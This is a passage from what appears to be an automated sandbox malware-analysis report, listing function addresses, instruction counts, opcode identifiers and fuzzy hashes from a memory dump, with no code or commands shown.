                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1da924091b6396d87edee89bf76373e307a18f04a5d59cf3c92953fd71c59f77
                                                                                                                                                                                                                                                • Instruction ID: 78f49802c12fcc132dbc5999ebb156685341fb34358a782447d48fbb11e95f92
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1da924091b6396d87edee89bf76373e307a18f04a5d59cf3c92953fd71c59f77
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E6E0C230205345CFFB55B714F856E6537E6E741328F004981E9009F2A8C7301C0FD781
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AE31C0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: d7e5f64a6dfb4d82fd44e030b0da6a7a4b4654c50e16891a7e20cafff678098f
                                                                                                                                                                                                                                                • Instruction ID: c73ad5336f6adde0452fd3a634c0701a60acecd05d19076b7bbce057a24a1d46
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7e5f64a6dfb4d82fd44e030b0da6a7a4b4654c50e16891a7e20cafff678098f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CD02E3A3002248B8A15232CF6088BE3BAFDEC4221300042AE20BD3240CF2A6C0747E5
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AE7D8D Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 133a8b5ed1003774243967b2007106a7303760c6c77a6d1d6ca5a27cb9a2c504
                                                                                                                                                                                                                                                • Instruction ID: 5ac9ff1e5016ecd2f4eb2e4f94caa68995ce9ec2af4340a6e618830650d0768b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 133a8b5ed1003774243967b2007106a7303760c6c77a6d1d6ca5a27cb9a2c504
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BE012367012109F9700ABE8F94486E77A9F7D82627004529EA09E3350DB355D068B51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AE7DD9 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dfb05bea6a91c62abdf4a1fa2295fdcb43e2469703ee54c87b33a769422515f0
                                                                                                                                                                                                                                                • Instruction ID: d2e748dbd09e12404e5976b01b9b2a67e04d3de74498fdd36af82acf8fb52470
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dfb05bea6a91c62abdf4a1fa2295fdcb43e2469703ee54c87b33a769422515f0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FFD05E3164D3844FCB13267158280783F349D2225779A08A7D049C7A93DA294C05CBA2
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AEDF98 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3be32f0a1b43b436b37fe46f9160a862f7dbf578d88e1382f0144d9f8ac58a74
                                                                                                                                                                                                                                                • Instruction ID: 36502c4838d5cc83ca2d43e148004ff30cf79c0725b3bf510b6f79283f683636
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3be32f0a1b43b436b37fe46f9160a862f7dbf578d88e1382f0144d9f8ac58a74
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CFE092B4D0424E9F8B94DFA9D8416BEBFF4AB48300F10816AD918E3640E6345A51CFE5
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AEBE90 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 330f9b386082e30a0e0a9c6e6d20cd2ada787817ee2616d6f98c5c6a39e44eb2
                                                                                                                                                                                                                                                • Instruction ID: 1799188b9629b100da5616072ccae549e3cfb35c4885382f5b800e48ba728c9c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 330f9b386082e30a0e0a9c6e6d20cd2ada787817ee2616d6f98c5c6a39e44eb2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BEE026347047848FD744DF39E0177527B96EB50709F048048C00547275C734E8538701
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AEB270 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 39f4f8f08c8dbf2805507266fef208ba8ba3f6aae9d786c4adbb9b672f93594a
                                                                                                                                                                                                                                                • Instruction ID: 949fc0b0b7997db329f7b4bcfd31ebc903316bfcabdf553b5b31a8ca956c1f79
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 39f4f8f08c8dbf2805507266fef208ba8ba3f6aae9d786c4adbb9b672f93594a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89D012326043286B9744FAAD54105DEBF9EDE84374B01806ED50DD7240ED72794443D9
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AE6D18 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 9229e8a290197e49a3b698c781a34a06672ab8a38e0a3ad0612f4f5f376807f2
                                                                                                                                                                                                                                                • Instruction ID: 33f3fe430786b27373122a393cbe578cac9a5a374d3d45f751816a6cf0864682
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9229e8a290197e49a3b698c781a34a06672ab8a38e0a3ad0612f4f5f376807f2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0CD05232398A449FCB02DF64C8408803F32FF0AA2030080EAFA848F233C2369822DB01
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AE78D8 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: adb73561126c1d668b4ee6c2ec421cc77d461c692e028e8a8a2965cb513e6bd5
                                                                                                                                                                                                                                                • Instruction ID: 309160649749146735d7cbedbdcb8c95c314dcb16fc0f6d036d91b28c028281c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: adb73561126c1d668b4ee6c2ec421cc77d461c692e028e8a8a2965cb513e6bd5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3BD0A71434D1D00FC352533C3A380682FB1CBC3511359C0EAD181D33E7C8180C068742
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AE0448 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: fdfc826d125f885dedf01b0e82fa045883f7219b024ceacc1dee84d94082b67e
                                                                                                                                                                                                                                                • Instruction ID: 75cfcb79da080d09fd359ecd3410826f17f4d4e7fabd9bd488e9b757ac90f7e0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fdfc826d125f885dedf01b0e82fa045883f7219b024ceacc1dee84d94082b67e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01C0807045130CDFC714AFADB908B6A7B7CFB03301F109654D40853190D7754840D56D
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AEB241 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 6150f4c9e64261d1608851178cb2b4826925d876b0aa93aff8265a7a276881dc
                                                                                                                                                                                                                                                • Instruction ID: 96917685cb1376fa87bf01d4b3784255a330d28b5e17ed86c383116996f07d31
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6150f4c9e64261d1608851178cb2b4826925d876b0aa93aff8265a7a276881dc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 68B092D6C6C1412FFB420260AC950C03F60E86232572202A9C08283102A00A860B8677
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00AE7D2A Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.356862097.0000000000AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AE0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_ae0000_bRz07Kk.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 61886088ad8721988dc6ddb3c257ea100a449c593523f53bb54d54c35006bf8b
                                                                                                                                                                                                                                                • Instruction ID: 547162a4dd58ec4d3d05f0fd8485763bfc7f54df0f80ea1234346da10df741f9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61886088ad8721988dc6ddb3c257ea100a449c593523f53bb54d54c35006bf8b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88B092367402148B8B09A66872181BC766AE7D81563048426E50BC1640CF384C024740
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%